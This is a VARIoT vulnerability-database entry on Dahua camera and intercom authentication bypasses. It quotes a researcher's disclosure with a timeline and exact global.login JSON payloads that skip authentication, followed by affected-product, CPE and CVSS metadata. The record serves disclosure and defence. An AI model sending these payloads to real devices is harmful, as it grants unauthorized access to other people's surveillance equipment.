Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
45 vulnerabilities by dahuasecurity
VAR-202109-1875
Vulnerability from variot - Updated: 2024-01-19 23:24The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]
Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)
Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole
-=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware
-=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure
-=[NetKeyboard Vulnerability]=-
CVE-2021-33044
Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}
[Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 }
-=[Loopback Vulnerability]=-
CVE-2021-33045
Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}
[Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 }
Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 }
[ETX]
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-1875",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hx5xxx",
"scope": null,
"trust": 1.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx3xxx",
"scope": null,
"trust": 1.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hum7xxx",
"scope": null,
"trust": 1.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hum7xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.820.0000000.5.r.210705"
},
{
"model": "vto-75x95x",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.300.0000003.0.r.210714"
},
{
"model": "vth-542xh",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.500.0000002.0.r.210715"
},
{
"model": "tpc-sd2221",
"scope": "lte",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.7.r.210707"
},
{
"model": "tpc-bf2221",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.10.r.210707"
},
{
"model": "vto-65xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.300.0000004.0.r.210715"
},
{
"model": "sd1a1",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "sd6al",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "sd50",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "sd41",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "tpc-bf5x21",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.8.r.210630"
},
{
"model": "ipc-hx3xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.800.0000000.29.r.210630"
},
{
"model": "tpc-bf1241",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.6.r.210707"
},
{
"model": "tpc-sd8x21",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.9.r.210706"
},
{
"model": "sd22",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "ipc-hx5xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.820.0000000.18.r.210705"
},
{
"model": "sd52c",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.812.0000007.0.r.210706"
},
{
"model": "tpc-bf5x01",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.12.r.210707"
},
{
"model": "tpc-pt8x21b",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.630.0000000.10.r.210701"
},
{
"model": "sd22",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "tpc-bf1241",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd6al",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd41",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd50",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd1a1",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd52c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-asi7213y-v3-t1",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-sd2221",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd52c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-sd8x21",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd6al",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-pt8x21b",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-bf2221",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd49",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd1a1",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd50",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "vth542xh",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-bf5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx5 xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "thermal tpc-bf1241",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz dome camera sd22",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "vto65xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx1xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "vto75x95x",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "build time but 2021 year 6 versions older than month"
},
{
"model": "ipc",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx3xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "hx5xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "hum7xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "vto75x95x versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "vto65xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "vth542xh versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "ptz dome camera sd1a1 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd22 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd49 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd50 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd52c versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "sd6al versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "thermal tpc-bf1241 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-bf2221 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-sd2221 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-bf5xxx versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-sd8x21 versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
},
{
"model": "tpc-pt8x21b versions which build time before june",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2021"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.820.0000000.5.r.210705",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.800.0000000.29.r.210630",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.820.0000000.18.r.210705",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd1a1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd1a1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd22_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd22:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd41_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd41:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.812.0000007.0.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf1241_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.6.r.210707",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf1241:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf2221_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.10.r.210707",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf2221:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf5x01_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.12.r.210707",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf5x01:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-pt8x21b_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.10.r.210701",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-pt8x21b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-sd2221_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.630.0000000.7.r.210707",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-sd2221:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-sd8x21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.9.r.210706",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-sd8x21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.300.0000004.0.r.210715",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.300.0000003.0.r.210714",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.500.0000002.0.r.210715",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf5x21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.630.0000000.8.r.210630",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf5x21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bashis",
"sources": [
{
"db": "PACKETSTORM",
"id": "164423"
}
],
"trust": 0.1
},
"cve": "CVE-2021-33044",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2021-33044",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "High",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 7.6,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2024-000007",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-103421",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "CNVD-2021-70816",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
